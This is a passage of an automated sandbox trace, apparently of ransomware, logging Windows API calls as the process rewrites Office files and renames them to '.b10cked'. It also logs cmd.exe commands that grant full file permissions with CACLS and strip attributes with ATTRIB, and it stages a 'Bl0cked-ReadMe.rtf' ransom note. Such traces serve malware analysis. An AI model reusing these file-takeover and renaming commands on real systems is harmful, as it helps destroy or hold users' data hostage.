lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0176.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x126760 [0176.460] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0176.460] CloseHandle (hObject=0x120) returned 1 [0176.468] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX") returned 0x3c [0176.469] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0176.470] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa88, dwThreadId=0xb0c)) returned 1 [0176.474] CloseHandle (hObject=0x1b4) returned 1 [0176.474] CloseHandle (hObject=0x120) returned 1 [0176.474] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0176.474] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0176.475] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0176.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.475] ReleaseMutex (hMutex=0xf8) returned 1 [0176.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.475] ReleaseMutex (hMutex=0xf8) returned 1 [0176.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.475] ReleaseMutex (hMutex=0xf8) returned 1 [0176.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.475] ReleaseMutex (hMutex=0xf8) returned 1 [0176.475] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23326441382) returned 1 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.477] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3478 [0176.477] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3960 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3960 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0176.574] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1caf, lpOverlapped=0x0) returned 1 [0176.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0176.575] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1caf, lpOverlapped=0x0) returned 1 [0176.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=-7343, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1cb1 [0176.575] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1caf, lpOverlapped=0x0) returned 1 [0176.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=-7343, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1cb1 [0176.577] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1caf, lpOverlapped=0x0) returned 1 [0176.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0176.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLSLICER.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0176.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3960 [0176.582] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0176.582] CloseHandle (hObject=0x120) returned 1 [0176.583] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX") returned 0x3c [0176.584] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0176.584] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa40, dwThreadId=0xbbc)) returned 1 [0176.631] CloseHandle (hObject=0x1b4) returned 1 [0176.631] CloseHandle (hObject=0x120) returned 1 [0176.631] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0176.631] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0176.631] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0176.631] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.631] ReleaseMutex (hMutex=0xf8) returned 1 [0176.631] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.631] ReleaseMutex (hMutex=0xf8) returned 1 [0176.631] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.632] ReleaseMutex (hMutex=0xf8) returned 1 [0176.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.632] ReleaseMutex (hMutex=0xf8) returned 1 [0176.632] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.634] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", lpFilePart=0x12eab4*="usertile10.bmp") returned 0x52 [0176.634] GetLastError () returned 0x5 [0176.634] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0176.635] LocalFree (hMem=0x1c6cc8) returned 0x0 [0176.635] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0176.635] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0176.635] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0176.635] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0176.635] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0176.635] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0176.635] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa5c, dwThreadId=0xb74)) returned 1 [0176.641] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0177.442] CloseHandle (hObject=0x1b4) returned 1 [0177.442] CloseHandle (hObject=0x120) returned 1 [0177.442] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0177.442] ReleaseMutex (hMutex=0xf8) returned 1 [0177.443] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0177.443] ReleaseMutex (hMutex=0xf8) returned 1 [0177.443] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0177.443] ReleaseMutex (hMutex=0xf8) returned 1 [0177.443] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0177.443] ReleaseMutex (hMutex=0xf8) returned 1 [0177.443] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.443] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", lpFilePart=0x12eab4*="usertile10.bmp") returned 0x52 [0177.443] GetLastError () returned 0x5 [0177.443] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0177.443] LocalFree (hMem=0x1c6cc8) returned 0x0 [0177.443] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0177.443] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0177.443] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0177.444] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0177.444] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0177.444] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0177.444] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 3 [0177.444] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0177.444] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0177.444] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0177.444] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0177.445] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0177.445] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0177.445] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", 